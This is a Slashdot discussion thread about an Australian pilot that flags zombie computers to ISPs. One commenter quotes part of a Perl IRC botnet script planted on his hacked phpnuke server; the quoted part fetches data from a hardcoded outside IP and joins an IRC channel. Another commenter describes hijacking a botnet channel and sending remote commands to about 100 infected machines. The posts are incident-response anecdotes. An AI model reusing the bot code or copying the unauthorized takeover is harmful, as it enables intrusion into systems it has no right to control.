AU Government To Pilot Target Zombies

msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"

dangerous

and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

slippery slope!

Echoing previous comments, I hope never

[BigTimOBrien]

We should be able to find a technical solution to this without having to get the government involved in what amounts to censorship. I'm not saying we don't have a problem, but I am confident that the last thing we want is to have hundreds of additional employees at the FCC regulating traffic on the internet and sending nasty letters to people asking them to conform or be disconnected.

Think about what would happen if the FCC were running around sending letters to people about computers that might be sending traffic they've deemed as disruptive? Couldn't the administrators at the FCC just use that as a pretext to monitor for P2P traffic? No thanks, Big Brother.

Re:I got excited for a second

[Capt+James+McCarthy]

They are actually called "Zombie Evildoers"

Why don't they target IRCops?

[t0qer]

I'm a broke geek. I host my website on a machine on a machine in my house. Last few weeks i've caught my machine being used for zombie purposes. Attack vector was a vulerability in phpnuke.

Let me explain "why I use that holy peice of shit"

The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)

So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.

Ok.. SSH into the machine. Same as before, same exploit.

poo:~# ls /tmp -al
total 20
drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

Finally I looked at bot.txt.

# IRC
my @adms=("bigfirex"); #nick dos administradores
my @canais=("#testebot");
use LWP::Simple;
my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
my $ircname = $dados;
chop (my $realname = `uname -n`);
$servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
my $porta='6667'; #porta do servidor d irc

Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.

I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"

I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.

I did a /who 0 and found an IRC op from IGS.ca Below is a log of the chat I had with him.

[msg(elsif)] hi are you an ircop?
[elsif(jake@admin.igs.ca)] sure
[msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
[msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
[elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
[msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
network
[elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
[elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their

Re:Why don't they target IRCops?

[ivan+kk]

By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsibile for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

This actually happened to me once. One of my friends machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be their, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
Turns out it was a couple of malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).

Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
Good luck with it.

Re:Carrot and Stick is the key

[KiloByte]

All it can do is disconnect it, and that just leads to support calsl and whining from the (l)user. ... and to lusers leaving you like a leaky ship. They just _hate_ being educated.

In many cases, you can block the relevant ports. 135, 137-139, 445, 5000 are among those that can be shut without any users even noticing. Blocking 25 would help, but you can't do that unless you're a monopoly. But, there is a trick out here -- count outgoing mails (-p tcp --dport 25 --tcp-flags SYN,ACK,FIN,RST SYN) and enact a block once they reach a certain threshold. At that point, if the user complain, you'll tell the user it's a virus what's breaking their e-mail.
This won't be as nice on the rest of the network as we would wish (as 100 first pieces of spam will get out), but it will provide the user with an incentive to clean up their box. And, if the user uses webmail, they will sleep with their worm silently, without any headaches for you.

And generally, any outage will be blamed on you, not the worms.

Re:When will people learn?

I've been meaning to write an anti-spyware Internet Exploder patch for a long time now:
 
It would patch the "You are about to install..." dialog, so instead of saying "Yes" and "No", the buttons would say, "No" and "FUCK No!"

No, it's actually happening.

[ScentCone]

We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!

How do you say "evil zombies" in French? "Malfaiteurs de Zombi?" I bet some people are wondering that right now (since they can't get to work this morning, what with their cars having been torched by nocturnal zombie throngs). Le *sigh*.

Re:No regulation for me.

[Pig+Hogger]

Most libertarians want as much social AND economic freedom as they can get.

So they can make money at the expense of others (social freedom = freedom to enslave others).

Most of the rest of the country doesn't realize that Liberty and Security are polar opposites.

An anglo-saxon fallacy!

Security is the absolute prerequisite for enjoying one's freedom. If one has to enforce his own freedom, he is so overwhelmed by the task that he has no time/ressources to enjoy his "freedom".

One's freedom **SHALL NEVER** infringe on someone else's freedom.

Some americans, by virtue of their money, are more free than others, and the former often have no problem infringing on the freedom of the latter.